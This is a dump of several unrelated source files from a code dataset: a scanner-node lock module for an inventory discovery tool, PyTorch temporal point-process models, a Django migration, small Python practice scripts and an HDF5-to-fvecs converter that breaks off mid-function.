    probePart = parts[0]
    typePart = parts[1]
    jobPart = parts[2]
    timePart = parts[3]
    expirationPart = parts[4]
    return Lock(probePart, int(typePart), jobPart, long(timePart), long(expirationPart))
def acquireScannerLock(Framework):
    """Try to take the exclusive scanner-node lock for this probe/job.

    Returns the new lock string on success, ScannerNodeLockedByCallHome when
    the node is held by a call-home job, or None when another probe/job holds
    a valid lock (caller should retry later).
    """
    client = Framework.getConnectedClient()
    # Prefer the probe manager IP as the lock owner id; fall back to probe name
    probe = CollectorsParameters.getValue(CollectorsParameters.KEY_PROBE_MGR_IP)
    if (probe is None) or (len(str(probe)) == 0):
        logger.debug('Probe manager ip is not specified in the DiscoveryProbe.properties file, using probe ID')
        probe = CollectorsParameters.getValue(CollectorsParameters.KEY_COLLECTORS_PROBE_NAME)
        if (probe is None) or (len(str(probe)) == 0):
            errorMessage = 'Failed to identify probe name. Lock was not set.'
            logger.debug(errorMessage)
            Framework.reportError(errorMessage)
            # NOTE(review): WorkflowStepStatus is not imported in this
            # module's visible imports -- confirm it is injected by the
            # Jython execution environment, otherwise this line raises
            # NameError.
            Framework.setStepExecutionStatus(WorkflowStepStatus.FATAL_FAILURE)
            return
    lockTime = System.currentTimeMillis()
    lockExpiration = System.currentTimeMillis() + LOCK_AGE_PERIOD_MILLISECONDS
    jobId = Framework.getDiscoveryJobId()
    jobType = INVENTORY_JOB_TYPE
    lock = Lock(probe, jobType, jobId, lockTime, lockExpiration)
    lockValue = lock.getLockInfo()
    logger.debug('Trying to lock node with value:', lockValue)
    existingLock = setNewLockIfExistingLockEmpty(client, lockValue)
    if (existingLock is None) or (len(existingLock) == 0):
        # lock was acquired
        return lockValue
    else:
        # found existing lock on remote machine
        remoteLock = extractLock(existingLock)
        logger.debug('Node was already locked:', remoteLock.printLockInfo())
        if not remoteLock.isLockExpired():
            # the lock is more or less fresh
            if lock.isSameLock(remoteLock):
                # this is our own lock, just renew it
                logger.debug('Found lock of same probe/job pair, renewing lock on the node')
                options = HashMap()
                options.put(ScannerNodeLock, lockValue)
                client.setOptionsMap(options)
                return lockValue
            # check whether we need to forcefully remove lock, happens in call home based inventory discovery
            forceAcquire = Framework.getParameter("IsForceLockAcquire")
            if forceAcquire == 'true':
                options = HashMap()
                options.put(ScannerNodeLock, lockValue)
                client.setOptionsMap(options)
                return lockValue
            # if the remote lock was owned by a call home inventory job, we should cancel the current job
            if remoteLock.jobType == CALLHOME_JOB_TYPE:
                logger.debug('Remote node was locked by call home inventory job, will cancel the current ' + jobId)
                return ScannerNodeLockedByCallHome
            logger.debug('Found valid lock is of different job/probe, will try next time')
            return None
        logger.debug('The found lock is already aged, to be removed')
        if not removeLockOption(Framework):
            return None
        # as there can be another probe / job trying to connect to this node, after removing existing lock
        # we don't set our own lock directly (as it can be removed by another probe/job) but go to sleep for some
        # time
        r = Random()
        waitTime = r.nextInt() % 5 + 1
        logger.debug('Going to wait for ' + str(waitTime) + ' seconds before retry to lock')
        event = Event()
        event.wait(waitTime)
        existingLock1 = setNewLockIfExistingLockEmpty(client, lockValue)
        if (existingLock1 is None) or (len(existingLock1) == 0):
            # lock was acquired at last!!!!
            return lockValue
        # there are other lucky guys
        return None
def releaseScannerLock(Framework):
    """Release the scanner-node lock if this probe/job currently owns it."""
    #checking that this destination is the owner of the lock
    lockValue = acquireScannerLock(Framework)
    if lockValue and (lockValue != ScannerNodeLockedByCallHome):
        return removeLockOption(Framework)
    else:
        # NOTE(review): the message and the return value look inverted --
        # this branch means the lock could NOT be (re)acquired by us, yet it
        # logs 'already acquired' and returns 1 (success). Preserved as-is;
        # confirm against the workflow steps that consume this result.
        logger.debug('Failed to remove lock as lock was already acquired')
        return 1
def removeLockOption(Framework):
    """Delete the lock option from the node, retrying around transient
    OS-level file locks; reports a framework error on final failure.

    Returns the truthy/falsy result of the last deleteOption attempt.
    """
    client = Framework.getConnectedClient()
    logger.debug('Removing lock!!!!')
    #there is a possibility that during unlock agent options file locked (os lock) by scanner as it is writing here (can be each 10 seconds)
    #in this case we can fail to release lock. for this purpose we want to retry here several time - kind of workaround for improper behavior
    i = LOCK_RELEASE_RETRIES
    lockReleased = client.deleteOption(ScannerNodeLock)
    while i > 0 and not lockReleased:
        time.sleep(0.1)
        logger.debug('Failed to release node lock, going to retry ' + str(i) + ' more times')
        lockReleased = client.deleteOption(ScannerNodeLock)
        if not lockReleased:
            logger.debug('Lock was not released after ' + str(LOCK_RELEASE_RETRIES - i) + ' retries')
        else:
            logger.debug('Lock was released after ' + str(LOCK_RELEASE_RETRIES - i) + ' retries')
        i -= 1
    if not lockReleased:
        Framework.reportError(inventoryerrorcodes.INVENTORY_DISCOVERY_FAILED_DELETEOPTION, [ScannerNodeLock])
    else:
        logger.debug('Lock was released after ' + str(LOCK_RELEASE_RETRIES - i) + ' retries')
    return lockReleased
#This method serves two scenarios:
#1. On regular workflow each step checks that lock was not removed as expired by other probe/job
#2. On run from particular step tries to aquire lock.
def ensureLock(Framework):
    """Verify an existing workflow lock, or acquire a fresh one when the
    workflow starts mid-way at this step.

    Returns checkLock's 0/1/callhome result when the lock already existed,
    otherwise acquireScannerLock's result (lock string / None / callhome).
    """
    stepName = Framework.getState().getCurrentStepName()
    setLock = Framework.getProperty(ScannerNodeSetLock)
    if setLock is not None:
        logger.debug('Lock was already acquired for workflow, checking that was not removed for step:', stepName)
        return checkLock(Framework)
    else:
        logger.debug('Lock was not acquired before step ', stepName, ', seems like workflow starts from this step, trying to aquire lock')
        setNewLock = acquireScannerLock(Framework)
        if setNewLock is not None and not setNewLock == ScannerNodeLockedByCallHome:
            logger.debug('Lock was acquired with value:', setNewLock)
            # Remember in workflow state that the lock is ours
            Framework.setProperty(ScannerNodeSetLock, ScannerNodeSetLock)
            Framework.setProperty(ScannerNodeLock, setNewLock)
        return setNewLock
def checkLock(Framework):
    """Check that the node lock still belongs to this probe/job.

    Returns 1 when the lock is ours (renewing it if expired), 0 when absent
    or owned by another inventory job, or ScannerNodeLockedByCallHome when a
    call-home job holds it.
    """
    probe = CollectorsParameters.getValue(CollectorsParameters.KEY_PROBE_MGR_IP)
    if (probe is None) or (len(str(probe)) == 0):
        logger.debug('Probe manager ip is not specified in the DiscoveryProbe.properties file, using probe ID')
        probe = CollectorsParameters.getValue(CollectorsParameters.KEY_COLLECTORS_PROBE_NAME)
    jobType = INVENTORY_JOB_TYPE
    jobId = Framework.getDiscoveryJobId()
    lockTime = System.currentTimeMillis()
    lockExpiration = System.currentTimeMillis() + LOCK_AGE_PERIOD_MILLISECONDS
    lock = Lock(probe, jobType, jobId, lockTime, lockExpiration)
    logger.debug('Checking remote lock with current lock:', str(lock.getLockInfo()))
    triggerid = Framework.getTriggerCIData('id')
    logger.debug('Checking lock for probe ', probe, ' and jobid ', jobId, ' and triggerid ', triggerid)
    client = Framework.getConnectedClient()
    options = getClientOptionsMap(client)
    lockOption = options.get(ScannerNodeLock)
    if (lockOption is None) or (len(lockOption.strip()) == 0):
        logger.debug('Lock on scanner node for probe "' + lock.probe + '" and job "' + lock.jobId + '" is not exists')
        return 0
    remoteLock = extractLock(lockOption)
    logger.debug('Found remote lock:', str(remoteLock.getLockInfo()))
    if remoteLock.isLockExpired():
        # Stale lock: overwrite with a fresh lock of our own
        logger.debug('Lock on remote node is already expired, renewing lock on the node')
        options = HashMap()
        options.put(ScannerNodeLock, lock.getLockInfo())
        client.setOptionsMap(options)
    elif not lock.isSameLock(remoteLock):
        logger.debug(
            'Lock on remote node is owned by another probe/job (' + remoteLock.probe + '/' + remoteLock.jobId + ')')
        if remoteLock.jobType == CALLHOME_JOB_TYPE:
            return ScannerNodeLockedByCallHome
        return 0
    return 1
def setNewLockIfExistingLockEmpty(client, newLock):
    """Write ``newLock`` to the node only when no lock is present, then
    re-read to detect a concurrent writer.

    Returns a falsy value when ``newLock`` ended up stored (lock acquired),
    otherwise the lock value currently held on the node.
    """
    currentLock = _getScannerLockValue(client)
    if currentLock:
        return currentLock
    opts = HashMap()
    opts.put(ScannerNodeLock, newLock)
    logger.debug("Set new lock:", newLock)
    client.setOptionsMap(opts)
    # double confirm the lock is mine
    observed = _getScannerLockValue(client)
    if observed != newLock:
        logger.debug('The current lock was not the lock just created.')
        return observed  # the lock doesn't not belong to me
    return currentLock
def _getScannerLockValue(client):
    """Return the node's current lock option value, or None when the option
    map is empty/unavailable."""
    optionsMap = getClientOptionsMap(client)
    return optionsMap.get(ScannerNodeLock) if optionsMap else None
def getClientOptionsMap(client):
    """Best-effort read of the agent option map; an empty Java HashMap is
    returned when the call fails for any reason."""
    try:
        options = client.getOptionsMap()
    except:
        # NOTE(review): bare except kept deliberately -- under Jython it also
        # catches Java exceptions, which `except Exception:` would miss.
        options = HashMap()
    return options
"silentbalanceyh@126.com"
] | silentbalanceyh@126.com |
b51e214752df3c3a6aeaa68376a8f788611c9c14 | 7246acf47da67a4ecbc1edd614c8cd881424474b | /text.py | 5d634e4e7a0a8ea447e8decf327291dcfe957537 | [] | no_license | RainingWish/Python-Learning | 15140384c31d94303a6c35beff866252631a8d2c | 6903ee61b3e9f55c9efb7e8ca23d8c50a34dd925 | refs/heads/master | 2020-05-30T18:44:06.721340 | 2019-07-30T19:22:31 | 2019-07-30T19:22:31 | 189,903,917 | 0 | 0 | null | 2019-06-03T00:58:15 | 2019-06-02T23:04:57 | null | UTF-8 | Python | false | false | 324 | py | print('linux basic command')
# Quick-reference cheat sheet of basic Linux commands (typos preserved
# verbatim so the printed output is unchanged).
for tip in (
    'create/edit a file => gedit',
    'move a file => mv',
    'enter a file => cd',
    'exit a file => cd ..',
    'delet a file => rm',
    'change a file name => mv oldname newname',
    'run a pythin file => python3',
    'create a new folder in linux => mkdir',
):
    print(tip)
| [
"noreply@github.com"
] | RainingWish.noreply@github.com |
9cc804fcf6b650847b0dc7078f440712ad4629c6 | d84bdb13a8ba320d3c6394cf84f5392a9bbefeb8 | /Homework_3/PublickKey.py | 1724c1e1c408e8dfad3482ee50299053d5dbd7ac | [] | no_license | Kygre/CMSI-282 | 0be5251f5db3fcc35afd667f8d8858bf637632c6 | 356a533803a827622b747cd08a4d757169313013 | refs/heads/master | 2021-01-14T12:36:02.903467 | 2015-05-01T01:31:37 | 2015-05-01T01:31:37 | 29,699,625 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | '''
Created on Mar 26, 2015
@author: Supreme
'''
if __name__ == '__main__':
    # Intentionally a no-op: homework stub with no entry-point logic yet.
    pass
"kyeboah1@lion.lmu.edu"
] | kyeboah1@lion.lmu.edu |
c1b655ee09ad177d840926d259ab2a963e65a616 | d73bc4f57319440b00578dd8f9b874217d8137c8 | /nfe/experiments/stpp/models/temporal/basic.py | ccbf699376bf1d673c93416a0e8dbf80754455fd | [] | no_license | rular099/neural-flows-experiments | 9643f027a1554029efced29337612b5e6fa33041 | bd19f7c92461e83521e268c1a235ef845a3dd963 | refs/heads/master | 2023-09-05T06:27:17.002620 | 2021-11-24T22:51:13 | 2021-11-24T22:51:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,394 | py | # Copyright (c) Facebook, Inc. and its affiliates.
import abc
import torch
import torch.nn as nn
import torch.nn.functional as F
class TemporalPointProcess(nn.Module, abc.ABC):
    """Abstract base class for temporal point process likelihood models.

    Bug fix: the original used ``__metaclass__ = abc.ABCMeta``, which is
    Python 2 syntax and is silently ignored by Python 3, so
    ``@abc.abstractmethod`` was never enforced and the base class could be
    instantiated. Deriving from ``abc.ABC`` (whose ABCMeta metaclass is
    compatible with nn.Module's) restores the intended behaviour.
    """

    @abc.abstractmethod
    def logprob(self, event_times, spatial_locations, input_mask, t0, t1):
        """Log-likelihood of a batch of event sequences.

        Args:
            event_times: (N, T) event timestamps.
            spatial_locations: per-event spatial marks (ignored by purely
                temporal models); added to the signature here to match every
                concrete implementation in this module.
            input_mask: (N, T) 1/0 mask of valid events.
            t0: (N,) or (1,) observation-window start.
            t1: (N,) or (1,) observation-window end.
        """
        raise NotImplementedError
class HomogeneousPoissonPointProcess(TemporalPointProcess):
    """Poisson process with a single learnable constant intensity."""

    def __init__(self):
        super().__init__()
        # Unconstrained weight; softplus maps it to a positive rate.
        self.lamb = nn.Parameter(torch.randn(1) * 0.2 - 2.0)

    def logprob(self, event_times, spatial_locations, input_mask, t0, t1):
        rate = F.softplus(self.lamb)
        n_events = input_mask.sum(-1)
        # log-likelihood = sum of per-event log-intensities minus the
        # compensator (integral of the constant intensity over [t0, t1]).
        return n_events * torch.log(rate + 1e-20) - (t1 - t0) * rate
class HawkesPointProcess(TemporalPointProcess):
    """Exponential-kernel Hawkes process.

    Intensity: lamb(t) = mu + alpha * sum_{t_i < t} exp(-beta (t - t_i)),
    with mu, alpha, beta kept positive via softplus.
    """

    def __init__(self):
        super().__init__()
        # Unconstrained parameters; softplus maps each to a positive value.
        self.mu = nn.Parameter(torch.randn(1) * 0.5 - 2.0)
        self.alpha = nn.Parameter(torch.randn(1) * 0.5 - 3.0)
        self.beta = nn.Parameter(torch.randn(1) * 0.5)

    def logprob(self, event_times, spatial_locations, input_mask, t0, t1):
        del spatial_locations  # purely temporal model; marks are unused

        mu = F.softplus(self.mu)
        alpha = F.softplus(self.alpha)
        beta = F.softplus(self.beta)

        # Pairwise gaps t_i - t_j; fill_triu pushes non-causal (j >= i)
        # entries to -1e20 so they vanish under exp(logsumexp(...)).
        dt = event_times[:, :, None] - event_times[:, None]  # (N, T, T)
        dt = fill_triu(-dt * beta, -1e20)
        lamb = torch.exp(torch.logsumexp(dt, dim=-1)) * alpha + mu  # (N, T)
        loglik = torch.log(lamb + 1e-8).mul(input_mask).sum(-1)  # (N,)

        # Closed-form compensator of the exponential kernel over [t0, t1];
        # padded events are masked to -1e20 inside the logsumexp.
        log_kernel = -beta * (t1[:, None] - event_times) * input_mask + (1.0 - input_mask) * -1e20

        compensator = (t1 - t0) * mu
        compensator = compensator - alpha / beta * (torch.exp(torch.logsumexp(log_kernel, dim=-1)) - input_mask.sum(-1))
        return loglik - compensator
class SelfCorrectingPointProcess(TemporalPointProcess):
    """Self-correcting process: the intensity grows as exp(mu * t) and is
    damped by exp(-beta) after every observed event."""

    def __init__(self):
        super().__init__()
        # Unconstrained parameters; softplus maps each to a positive value.
        self.mu = nn.Parameter(torch.randn(1) * 0.5 - 2.0)
        self.beta = nn.Parameter(torch.randn(1) * 0.5)

    def logprob(self, event_times, spatial_locations, input_mask, t0, t1):
        del spatial_locations  # purely temporal model; marks are unused
        N, T = event_times.shape

        mu = F.softplus(self.mu)
        beta = F.softplus(self.beta)

        # beta * (number of preceding events) for each slot i = 0..T-1
        betaN = beta * torch.arange(T).reshape(1, T).expand(N, T).to(beta)  # (N, T)

        # log-intensity at the i-th event: mu * t_i - beta * i
        loglik = mu * event_times - betaN  # (N, T)
        loglik = loglik.mul(input_mask).sum(-1)  # (N,)

        # Piecewise-exact compensator: integrate exp(mu t - beta N(t)) over
        # each inter-event interval; torch.where keeps padded slots from
        # advancing the interval start.
        t0_i = t0.reshape(-1).expand(N)
        N_i = torch.zeros(N).to(event_times)
        compensator = torch.zeros(N).to(event_times)
        for i in range(T):
            t1_i = torch.where(input_mask[:, i].bool(), event_times[:, i], t0_i)
            compensator = compensator + torch.exp(-beta * N_i) / mu * (torch.exp(mu * t1_i) - torch.exp(mu * t0_i))
            t0_i = torch.where(input_mask[:, i].bool(), event_times[:, i], t0_i)
            N_i = N_i + input_mask[:, i]

        # Tail interval from the last event up to the window end t1
        compensator = compensator + torch.exp(-beta * N_i) / mu * (torch.exp(mu * t1) - torch.exp(mu * t0_i))
        return loglik - compensator  # (N,)
def lowtri(A):
    """Strictly-lower-triangular part of ``A`` (main diagonal zeroed)."""
    return A.tril(diagonal=-1)
def fill_triu(A, value):
    """Return ``A`` with the diagonal and upper triangle replaced by ``value``.

    The input tensor is not modified; a new tensor is returned.
    """
    strictly_lower = torch.tril(A, diagonal=-1)
    upper_fill = torch.triu(torch.ones_like(A)) * value
    return strictly_lower + upper_fill
| [
"ge67kun@tum.de"
] | ge67kun@tum.de |
16e7fdfef767ec7714498f24240a46a7136ba080 | d89b10564406795d15745c025db3a061c04e1d9a | /theblog/migrations/0026_auto_20210920_2031.py | fe62bf834b9dfc5a3b85be8ef97a70f50e8bb860 | [] | no_license | Karthik-SK12345/placement360 | 7eea948a907ad1988f5683374b11deed98acbc43 | 07a86c4bc113e7060f8f7fbbd634c32bb7fa88b0 | refs/heads/main | 2023-08-23T01:40:59.064011 | 2021-10-07T05:48:24 | 2021-10-07T05:48:24 | 414,471,756 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | # Generated by Django 3.2.7 on 2021-09-20 15:01
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated schema migration for the `theblog` app.

    NOTE(review): RenameField keeps the existing column data, so `email` and
    `linkedin_url` inherit whatever was stored in `facebook_url` /
    `instagram_url` -- confirm that is intended before deploying.
    """
    dependencies = [
        ('theblog', '0025_remove_comment_name'),
    ]
    operations = [
        # facebook_url -> email (column data preserved by the rename).
        migrations.RenameField(
            model_name='profile',
            old_name='facebook_url',
            new_name='email',
        ),
        # instagram_url -> linkedin_url (data preserved).
        migrations.RenameField(
            model_name='profile',
            old_name='instagram_url',
            new_name='linkedin_url',
        ),
        # Drop the remaining social-link columns entirely.
        migrations.RemoveField(
            model_name='profile',
            name='pinterest_url',
        ),
        migrations.RemoveField(
            model_name='profile',
            name='twitter_url',
        ),
    ]
| [
"karthiks.cs19@bmsce.ac.in"
] | karthiks.cs19@bmsce.ac.in |
42b9a90f54d0ca07736c444a10588a8a3ec12c3a | 7cb68264f1ddd83ecd6c421dc01de6ac3748a117 | /.vscode/test/test16.py | 698ece78addbcef9c2de874e1f01afb7a65e8130 | [] | no_license | tyro-ops/Python1 | 2cc54e406d55ff73ced0a66da3d2459ae83edb49 | 1306686a0eda416aaa799e80009a1130eaa8c7d3 | refs/heads/master | 2022-05-24T12:52:52.598436 | 2020-04-25T12:38:14 | 2020-04-25T12:38:14 | 258,771,642 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | import requests
import pprint
import csv
import json
from pathlib import Path
# Fetch one random user from randomuser.me and dump the JSON payload to a few
# files under the user's home directory.
home = str(Path.home())
smd = home + '/Documents/Office/Automation/python1/.vscode/test/csv.csv'
print(smd)
url = 'https://randomuser.me/api/?results=1'
# BUG FIX: the original dict listed 'accept' twice ("application/json" then
# "text/csv"); Python keeps only the last duplicate key, so "text/csv" was
# the value actually sent.  The dead first entry has been removed.
headers = {'authorization': "Basic API Key Ommitted",
           'accept': "text/csv"}
users = requests.get(url, headers=headers).json()
pprint.pprint(users)
result = json.dumps(users)
# Mode "w" already truncates, so the explicit truncate(0) calls were
# redundant; `with` guarantees the handles are closed even on error.
with open(home + '/Documents/Office/Automation/python1/.vscode/test/csv.csv', "w") as f:
    f.write(result)
with open(home + '/Documents/Office/Automation/python1/.vscode/test/csv.xls', "w") as f:
    f.write(result)
# BUG FIX: the original called json.dump(result, ...) where `result` is
# already a JSON *string*, producing a double-encoded file.  Dump the decoded
# object instead.
with open(home + '/Documents/Office/Automation/python1/.vscode/test/test.json', 'w') as outfile:
    json.dump(users, outfile)
| [
"yogesh.kalbhore@ril.com"
] | yogesh.kalbhore@ril.com |
311d126412fec77099c5dc7c1c9309b48d20436b | ba04312b06a1b6aa43dfb5a0ed9029cb9069814b | /Day 7/Q4.py | 0b1fb28b4a2f14d855c07970a5ce02db0b60a8c9 | [] | no_license | rishky1997/Python-Practice | c2ac154bd68b880e369d4ec3150650c53a9e615a | 8f651952af2223ded2b64dd3edc8c4d87095b15d | refs/heads/master | 2022-10-07T10:49:17.352237 | 2020-06-11T00:11:04 | 2020-06-11T00:11:04 | 266,185,251 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 133 | py | #4. Write a program to count how many reference variables in a program.
import sys
# Two equal int literals large enough (> 256) to fall outside CPython's
# small-int cache; whether `a` and `b` end up as one shared object is an
# implementation detail (constant folding may merge equal literals in the
# same code block) -- the printed count depends on it.  TODO confirm on the
# interpreter in use.
a=1111
b=1111
c=a
d=b
# sys.getrefcount reports one extra reference: the temporary created by
# passing `a` as the call argument.
print(sys.getrefcount(a))
| [
"rishky1997@gmail.com"
] | rishky1997@gmail.com |
885520d72abf872038dadfba2490ecf178af6550 | f95415394db4c1b96021f06f86b0a1174cde77cf | /code/pose_estimation/train.py | 0428c4f420e2e8c5c400eba47756bbcb347511b4 | [] | no_license | pigunther/Intro2CV_project | 5fa4bb7a68a560d672567086359f99b49c3814fe | 003f57763e5788bfe28ff0654d1a34cb792a5b5b | refs/heads/master | 2020-10-01T13:40:46.763477 | 2019-12-19T14:20:52 | 2019-12-19T14:20:52 | 227,549,643 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,355 | py | import numpy as np
import torch
import ast
def train(train_loader, valid_loader, model, criterion, optimizer, device,
          n_epochs=100, saved_model='model.pt'):
    '''
    Train the model, checkpointing whenever the validation loss improves.
    Args:
        train_loader (DataLoader): DataLoader for train Dataset
        valid_loader (DataLoader): DataLoader for valid Dataset
        model (nn.Module): model to be trained on
        criterion (torch.nn): loss function
        optimizer (torch.optim): optimization algorithm
        device (torch.device): device inputs/targets are moved to
        n_epochs (int): number of epochs to train the model
        saved_model (str): file path for saving model
    Return:
        tuple of train_losses, valid_losses (one RMS value per epoch)
    '''
    # initialize tracker for minimum validation loss
    # NOTE(review): np.Inf was removed in NumPy 2.0; use np.inf if upgrading.
    valid_loss_min = np.Inf  # set initial "min" to infinity
    train_losses = []
    valid_losses = []
    for epoch in range(n_epochs):
        # monitor training loss
        train_loss = 0.0
        valid_loss = 0.0
        ###################
        # train the model #
        ###################
        model.train()  # prep model for training
        train_num = 0
        for batch in train_loader:
            # clear the gradients of all optimized variables
            optimizer.zero_grad()
            # forward pass: batch['keypoints'] holds *stringified* arrays;
            # string_to_list parses them (mutating the batch list in place).
            output = model(torch.DoubleTensor(string_to_list(batch['keypoints'])).to(device))
            # Build one-hot targets: labels look like 'c<digit>' -> class
            # index, over 10 classes (width hard-coded; confirm label format).
            answer = torch.zeros(len(batch['answer']), 10)
            for i, cl in enumerate(batch['answer']):
                answer[i][int(cl[1:])] = 1.0
            loss = criterion(output.double(), answer.to(device).double())
            # backward pass: compute gradient of the loss with respect to model parameters
            loss.backward()
            # perform a single optimization step (parameter update)
            optimizer.step()
            # update running training loss; the * 10 factor presumably
            # rescales by batch size -- TODO confirm.
            train_loss += loss.item() * 10
            train_num += 1
            # NOTE(review): caps each epoch at 11 batches -- looks like a
            # debugging shortcut left in place.
            if train_num > 10:
                break
        ######################
        # validate the model #
        ######################
        model.eval()  # prep model for evaluation
        train_num = 0
        for batch in valid_loader:
            # forward pass: compute predicted outputs by passing inputs to the model
            output = model(torch.DoubleTensor(string_to_list(batch['keypoints'])).to(device))
            # calculate the loss against the same one-hot encoding as above
            answer = torch.zeros(len(batch['answer']), 10)
            for i, cl in enumerate(batch['answer']):
                answer[i][int(cl[1:])] = 1.0
            loss = criterion(output.double(), answer.to(device).double())
            # update running validation loss (same * 10 scaling as training)
            valid_loss += loss.item() * 10
            train_num += 1
            # NOTE(review): same 11-batch cap as the training loop.
            if train_num > 10:
                break
        # print training/validation statistics
        # calculate average Root Mean Square loss over an epoch
        # NOTE(review): divides by the full sampler size even though the
        # loops above break early, so the reported RMS is understated.
        train_loss = np.sqrt(train_loss / len(train_loader.sampler.indices))
        valid_loss = np.sqrt(valid_loss / len(valid_loader.sampler.indices))
        train_losses.append(train_loss)
        valid_losses.append(valid_loss)
        print('Epoch: {} \tTraining Loss: {:.6f} \tValidation Loss: {:.6f}'
              .format(epoch + 1, train_loss, valid_loss))
        # save model if validation loss has decreased
        if valid_loss <= valid_loss_min:
            print('Validation loss decreased ({:.6f} --> {:.6f}). Saving model ...'
                  .format(valid_loss_min, valid_loss))
            torch.save(model.state_dict(), saved_model)
            valid_loss_min = valid_loss
    # Debug dump of the final batch's targets and outputs.
    print(answer, output)
    return train_losses, valid_losses
def string_to_list(list_str):
    """Parse stringified integer arrays (e.g. "[1 2 3]") into lists of ints.

    Each element of ``list_str`` is replaced *in place* by its parsed list of
    integers, and the (mutated) input list is also returned for convenience.
    """
    for i, raw in enumerate(list_str):
        # BUG FIX: the original collapsed only one level of repeated spaces
        # before split(' '), so runs of 3+ spaces produced '' tokens and an
        # int('') ValueError.  str.split() with no argument splits on any run
        # of whitespace (spaces, newlines, tabs) and drops empty tokens.
        tokens = raw.replace('[', '').replace(']', '').split()
        list_str[i] = [int(tok) for tok in tokens]
    return list_str
"basimova.nf@phystech.edu"
] | basimova.nf@phystech.edu |
1d3ac756a8d4d9d98d12b0f26d31d37c374a57f3 | a2c1e50d606b3ed158a64edeeb5b1fc505841597 | /3주차_금요일_과제/practice1/accounts/urls.py | 88c671e1f053df9eef20562982ec1a51bb46f0ae | [] | no_license | genyeon9/piro11 | a492dabbaaded9ca865bd7f6a48f99480bffa004 | 4d37631f950f536c0220e0ad5e7eb62f073f4506 | refs/heads/master | 2022-11-30T00:57:43.157806 | 2019-07-23T08:38:53 | 2019-07-23T08:38:53 | 194,772,271 | 0 | 1 | null | 2022-11-04T05:05:12 | 2019-07-02T02:17:59 | Python | UTF-8 | Python | false | false | 126 | py | from django.urls import path
from . import views
app_name = 'accounts'
urlpatterns = [
path('profile/', views.profile)
]
| [
"kjh_5771@naver.com"
] | kjh_5771@naver.com |
e42c88dd6e5117097b5a733069f1a1a19d94832a | f8dd9e18e22f030844aa3f683eb2ee7f89a11595 | /EXPERIMENTS/prepare_l1.py | b75b15141fe7356a5006704250ca9ecfa7793e15 | [] | no_license | Why1221/MP-RW-LSH | aeac4bef80540f454f9b11f520f552689f2b26ff | 01620622071231a25fedf31e9b3722c04e970cae | refs/heads/main | 2023-06-22T07:14:35.154471 | 2021-07-23T23:12:34 | 2021-07-23T23:12:34 | 382,652,613 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,600 | py | #!/usr/bin/env python3
from enum import Enum
import sys
import struct
import numpy as np
import h5py
import os.path
import click
class Scale(Enum):
    """Dataset-size buckets (used by the commented-out DATASETS map below)."""
    SMALL = 0
    MEDIUM = 1
    LARGE = 2
# DATASETS = {
#     Scale.SMALL: ['audio', 'mnist', 'enron'],
#     Scale.MEDIUM: ['glove', 'GIST1M', 'SIFT1M'],
#     Scale.LARGE: ['GIST80M', "SIFT1B"]
# }
# Filled by prepare_datasets(): dataset name -> metadata dict from convert().
DATASET_INFO = {}
# Directory containing this script; the datasets/ dir is resolved against it.
CUR_PATH = os.path.dirname(__file__)
def get_dim(h5filename):
    """Return the dimensionality encoded after the last '-' in the file stem,
    e.g. 'glove-100.h5' -> 100."""
    stem = os.path.splitext(h5filename)[0]
    return int(stem.rsplit('-', 1)[-1])
# def uint64_to_binary(num):
# return [float(c) for c in f"{num:0>64b}"]
def get_dsname(h5filename):
    """Return everything before the first '-' (the whole name if there is none)."""
    return h5filename.split('-', 1)[0]
def convert(h5filename, odir):
    """Convert one HDF5 dataset file into fvecs + text files under ``odir``.

    Writes <prefix>-train/-test in two formats:
      * .fvecs: per point, an int32 dimension followed by dim float32 values
        (see the struct.pack('i', ...) / struct.pack('f', ...) calls below);
      * .txt: per point, space-separated integer coordinates; query points
        are additionally prefixed with their 0-based index.
    The HDF5 'train'/'test' datasets are treated as flat arrays of length
    n * dim.  Returns a metadata dict with file names, n, dimension, qn and
    the largest coordinate value ('universe').
    """
    assert os.path.exists(odir)
    print(f'Converting {h5filename} ...')
    _, name = os.path.split(h5filename)
    filename_prefix, _ = os.path.splitext(name)
    # Dimension is encoded in the file name (see get_dim).
    dim = get_dim(h5filename)
    qn = -1
    with h5py.File(h5filename, 'r') as inf:
        train_fn = f"{odir}/{filename_prefix}-train.fvecs"
        test_bfn = f"{odir}/{filename_prefix}-test.fvecs"
        train_tfn = f"{odir}/{filename_prefix}-train.txt"
        test_tfn = f"{odir}/{filename_prefix}-test.txt"
        with open(train_fn, 'wb') as df:
            with open(test_bfn, 'wb') as qf:
                with open(train_tfn, 'w') as dtf:
                    with open(test_tfn, 'w') as qtf:
                        # Materialize the flat arrays; one point occupies
                        # `dim` consecutive values.
                        train = inf['train'][:]
                        n = (int)(train.shape[0] / dim)
                        print(f"#dim: {dim}, #points: {n}")
                        query = inf['test'][:]
                        qn = (int)(query.shape[0] / dim)
                        # Largest coordinate across both splits.
                        universe = max(np.max(train),np.max(query))
                        cnt = 0
                        for i in range(n):
                            # fvecs record: int32 dim, then dim float32s.
                            df.write(struct.pack('i', dim))
                            point = train[(i * dim):((i+1) * dim)]
                            for val in point:
                                df.write(struct.pack('f', float(val)))
                                cnt += 1
                            # Text record: space-separated integer coords.
                            bs = []
                            for j in range(dim):
                                bs.append(str(int(train[i*dim+j])))
                            sbs = " ".join(bs)
                            # it seems srs only accepts integer index
                            dtf.write(sbs + '\n')
                        cnt = 0
                        for i in range(qn):
                            qf.write(struct.pack('i', dim))
                            point = query[(i * dim):((i+1) * dim)]
                            for val in point:
                                qf.write(struct.pack('f', float(val)))
                                cnt += 1
                            qbs = []
                            for j in range(dim):
                                qbs.append(str(int(query[i*dim+j])))
                            sqbs = " ".join(qbs)
                            # it seems srs only accepts integer index
                            # Queries carry a leading 0-based index.
                            qtf.write(str(i) + ' ' + sqbs + '\n')
    # n/universe are bound inside the with-blocks above; Python function
    # scoping makes them visible here.
    return {
        'train-b': os.path.split(train_fn)[-1],
        'test-b': os.path.split(test_bfn)[-1],
        'train-t':os.path.split(train_tfn)[-1],
        'test-t':os.path.split(test_tfn)[-1],
        'n': int(n),
        'dimension': int(dim),
        'qn': int(qn),
        'dsh5': name,
